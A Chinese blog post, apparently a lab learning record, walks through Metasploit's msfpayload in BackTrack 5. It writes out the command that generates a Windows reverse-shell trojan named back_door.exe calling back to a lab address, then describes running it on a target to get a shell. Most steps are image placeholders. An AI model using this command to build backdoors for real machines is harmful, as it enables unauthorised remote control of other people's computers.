msf攻击载荷生成器

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_41603265/article/details/82954579

0x00 前言

这是我对 msf攻击载荷生成器的学习记录。

0x01 拓扑结构

在这里插入图片描述

0x02 过程

1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程

1.1 显示msfpayload命令的使用方法:msfpayload -h
在这里插入图片描述

1.2显示msfpayload支持的全面载荷:msfpayload -l
在这里插入图片描述

1.3显示windows/shell_reverse_tcp这个payload需要设置的参数:msfpayload windows/shell_reverse_tcp O
在这里插入图片描述

1.4设置反弹连接的地址为IP(BackTrack 5),“X”参数表示生成可执行文件,可执行文件名为back_door.exe,该文件在当前目录下: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.106 X >back_door.exe

在这里插入图片描述

1.5使用命令ls显示当前目录

在这里插入图片描述
1.6拷贝该可执行文件到服务端计算机上

2. 启动metasploit

1.7在执行该可执行文件前,架设监听的服务器,启动metasploit

在这里插入图片描述
1.8启用模块
在这里插入图片描述

1.9设置payload

在这里插入图片描述
1.10查看选项
在这里插入图片描述

1.11设置选项
在这里插入图片描述

1.12 exploit

在这里插入图片描述
1.13在服务端计算机上执行文件
在这里插入图片描述

1.14成功建立反弹连接

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_41603265/article/details/82954579
今日推荐